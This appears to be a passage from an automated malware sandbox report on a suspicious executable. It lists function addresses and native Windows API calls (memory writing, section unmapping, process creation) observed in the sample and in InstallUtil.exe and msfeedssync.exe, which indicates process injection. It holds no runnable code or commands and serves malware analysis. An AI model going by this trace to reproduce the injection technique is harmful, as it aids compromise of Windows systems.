Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2AB0 NtWaitForSingleObject,	9_2_02CE2AB0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2B80 NtQueryInformationFile,	9_2_02CE2B80
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2EA0 NtAdjustPrivilegesToken,	9_2_02CE2EA0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2E30 NtWriteVirtualMemory,	9_2_02CE2E30
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2F90 NtProtectVirtualMemory,	9_2_02CE2F90
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2FA0 NtQuerySection,	9_2_02CE2FA0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2F60 NtCreateProcessEx,	9_2_02CE2F60
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2CC0 NtQueryVirtualMemory,	9_2_02CE2CC0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2CF0 NtOpenProcess,	9_2_02CE2CF0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2C00 NtQueryInformationProcess,	9_2_02CE2C00
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2DB0 NtEnumerateKey,	9_2_02CE2DB0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2D00 NtSetInformationFile,	9_2_02CE2D00
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE3090 NtSetValueKey,	9_2_02CE3090
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE3010 NtOpenDirectoryObject,	9_2_02CE3010
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE3D70 NtOpenThread,	9_2_02CE3D70
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE3D10 NtOpenProcessToken,	9_2_02CE3D10
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02499330 NtReadFile,	9_2_02499330
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_024991D0 NtCreateFile,	9_2_024991D0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02499610 NtAllocateVirtualMemory,	9_2_02499610
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02499420 NtDeleteFile,	9_2_02499420
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_024994C0 NtClose,	9_2_024994C0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02ABF884 NtUnmapViewOfSection,	9_2_02ABF884

Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 0_2_0149ABC0	0_2_0149ABC0
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 0_2_0149EE88	0_2_0149EE88
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 0_2_014919B8	0_2_014919B8
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 0_2_0149ABB1	0_2_0149ABB1
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 0_2_014919B8	0_2_014919B8
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 0_2_064635C0	0_2_064635C0
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 0_2_064635B0	0_2_064635B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_004186C3	2_2_004186C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00403000	2_2_00403000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_004168C3	2_2_004168C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0040E0C3	2_2_0040E0C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_004100D3	2_2_004100D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_004168BE	2_2_004168BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_004021DA	2_2_004021DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_004021E0	2_2_004021E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_004011A0	2_2_004011A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0040E25C	2_2_0040E25C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0040E207	2_2_0040E207
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0040E213	2_2_0040E213
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0040239D	2_2_0040239D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_004023A0	2_2_004023A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0042ED53	2_2_0042ED53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00402690	2_2_00402690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0040FEAD	2_2_0040FEAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0040FEB3	2_2_0040FEB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01090100	2_2_01090100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113A118	2_2_0113A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01128158	2_2_01128158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011541A2	2_2_011541A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011601AA	2_2_011601AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011581CC	2_2_011581CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01132000	2_2_01132000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115A352	2_2_0115A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011603E6	2_2_011603E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010AE3F0	2_2_010AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01140274	2_2_01140274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011202C0	2_2_011202C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010A0535	2_2_010A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01160591	2_2_01160591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01144420	2_2_01144420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01152446	2_2_01152446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0114E4F6	2_2_0114E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010C4750	2_2_010C4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010A0770	2_2_010A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0109C7C0	2_2_0109C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010BC6E0	2_2_010BC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010B6962	2_2_010B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0116A9A6	2_2_0116A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010AA840	2_2_010AA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010868B8	2_2_010868B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010CE8F0	2_2_010CE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115AB40	2_2_0115AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01156BD7	2_2_01156BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0109EA80	2_2_0109EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010AAD00	2_2_010AAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113CD1F	2_2_0113CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010B8DBF	2_2_010B8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0109ADE0	2_2_0109ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010A0C00	2_2_010A0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01140CB5	2_2_01140CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01090CF2	2_2_01090CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01142F30	2_2_01142F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010E2F28	2_2_010E2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010C0F30	2_2_010C0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01114F40	2_2_01114F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0111EFA0	2_2_0111EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01092FC8	2_2_01092FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010ACFE0	2_2_010ACFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115EE26	2_2_0115EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010A0E59	2_2_010A0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115CE93	2_2_0115CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010B2E90	2_2_010B2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115EEDB	2_2_0115EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D516C	2_2_010D516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0108F172	2_2_0108F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0116B16B	2_2_0116B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010AB1B0	2_2_010AB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0114F0CC	2_2_0114F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115F0E0	2_2_0115F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011570E9	2_2_011570E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115132D	2_2_0115132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0108D34C	2_2_0108D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010E739A	2_2_010E739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010A52A0	2_2_010A52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010BB2C0	2_2_010BB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011412ED	2_2_011412ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01157571	2_2_01157571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113D5B0	2_2_0113D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011695C3	2_2_011695C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115F43F	2_2_0115F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01091460	2_2_01091460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115F7B0	2_2_0115F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010E5630	2_2_010E5630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011516CC	2_2_011516CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01135910	2_2_01135910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010A9950	2_2_010A9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010BB950	2_2_010BB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0110D800	2_2_0110D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010A38E0	2_2_010A38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115FB76	2_2_0115FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010BFB80	2_2_010BFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01115BF0	2_2_01115BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010DDBF9	2_2_010DDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01157A46	2_2_01157A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115FA49	2_2_0115FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01113A6C	2_2_01113A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010E5AA0	2_2_010E5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01141AA3	2_2_01141AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0114DAC6	2_2_0114DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010A3D40	2_2_010A3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01151D5A	2_2_01151D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01157D73	2_2_01157D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010BFDC0	2_2_010BFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01119C32	2_2_01119C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115FCF2	2_2_0115FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115FF09	2_2_0115FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010A1F92	2_2_010A1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115FFB1	2_2_0115FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01063FD5	2_2_01063FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01063FD2	2_2_01063FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010A9EB0	2_2_010A9EB0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D302C0	9_2_02D302C0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D50274	9_2_02D50274
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D703E6	9_2_02D703E6
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CBE3F0	9_2_02CBE3F0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D6A352	9_2_02D6A352
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D42000	9_2_02D42000
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D681CC	9_2_02D681CC
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D641A2	9_2_02D641A2
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D701AA	9_2_02D701AA
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D38158	9_2_02D38158
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CA0100	9_2_02CA0100
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D4A118	9_2_02D4A118
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CCC6E0	9_2_02CCC6E0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CAC7C0	9_2_02CAC7C0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CD4750	9_2_02CD4750
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CB0770	9_2_02CB0770
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D5E4F6	9_2_02D5E4F6
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D62446	9_2_02D62446
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D54420	9_2_02D54420
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D70591	9_2_02D70591
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CB0535	9_2_02CB0535
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CAEA80	9_2_02CAEA80
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D66BD7	9_2_02D66BD7
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D6AB40	9_2_02D6AB40
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CDE8F0	9_2_02CDE8F0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02C968B8	9_2_02C968B8
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CBA840	9_2_02CBA840
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D7A9A6	9_2_02D7A9A6
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CC6962	9_2_02CC6962
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D6EEDB	9_2_02D6EEDB
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D6CE93	9_2_02D6CE93
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CC2E90	9_2_02CC2E90
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CB0E59	9_2_02CB0E59
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D6EE26	9_2_02D6EE26
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CA2FC8	9_2_02CA2FC8
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CBCFE0	9_2_02CBCFE0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D2EFA0	9_2_02D2EFA0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D24F40	9_2_02D24F40
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D52F30	9_2_02D52F30
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CF2F28	9_2_02CF2F28
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CD0F30	9_2_02CD0F30
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CA0CF2	9_2_02CA0CF2
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D50CB5	9_2_02D50CB5
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CB0C00	9_2_02CB0C00
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CAADE0	9_2_02CAADE0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CC8DBF	9_2_02CC8DBF
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CBAD00	9_2_02CBAD00
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D4CD1F	9_2_02D4CD1F
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CCB2C0	9_2_02CCB2C0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D512ED	9_2_02D512ED
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CB52A0	9_2_02CB52A0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CF739A	9_2_02CF739A
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02C9D34C	9_2_02C9D34C
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D6132D	9_2_02D6132D
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D5F0CC	9_2_02D5F0CC
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D6F0E0	9_2_02D6F0E0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D670E9	9_2_02D670E9
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CBB1B0	9_2_02CBB1B0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE516C	9_2_02CE516C
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02C9F172	9_2_02C9F172
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D7B16B	9_2_02D7B16B
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D616CC	9_2_02D616CC
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CF5630	9_2_02CF5630
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D6F7B0	9_2_02D6F7B0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CA1460	9_2_02CA1460
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D6F43F	9_2_02D6F43F
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D4D5B0	9_2_02D4D5B0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D67571	9_2_02D67571
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D5DAC6	9_2_02D5DAC6
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CF5AA0	9_2_02CF5AA0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D51AA3	9_2_02D51AA3
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D67A46	9_2_02D67A46
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D6FA49	9_2_02D6FA49
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D23A6C	9_2_02D23A6C
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D25BF0	9_2_02D25BF0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CEDBF9	9_2_02CEDBF9
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CCFB80	9_2_02CCFB80
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D6FB76	9_2_02D6FB76
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CB38E0	9_2_02CB38E0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D1D800	9_2_02D1D800
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CB9950	9_2_02CB9950
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CCB950	9_2_02CCB950
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D45910	9_2_02D45910
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CB9EB0	9_2_02CB9EB0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CB1F92	9_2_02CB1F92
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D6FFB1	9_2_02D6FFB1
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D6FF09	9_2_02D6FF09
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D6FCF2	9_2_02D6FCF2
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D29C32	9_2_02D29C32
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CCFDC0	9_2_02CCFDC0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CB3D40	9_2_02CB3D40
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D61D5A	9_2_02D61D5A
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02D67D73	9_2_02D67D73
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02481D90	9_2_02481D90
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_0247AE20	9_2_0247AE20
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_0247CE30	9_2_0247CE30
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_0247AF64	9_2_0247AF64
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_0247AF70	9_2_0247AF70
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_0247AFB9	9_2_0247AFB9
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_0247CC0A	9_2_0247CC0A
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_0247CC10	9_2_0247CC10
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_0248361B	9_2_0248361B
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02483620	9_2_02483620
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02485420	9_2_02485420
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_0249BAB0	9_2_0249BAB0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02ABE313	9_2_02ABE313
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02ABE1F5	9_2_02ABE1F5
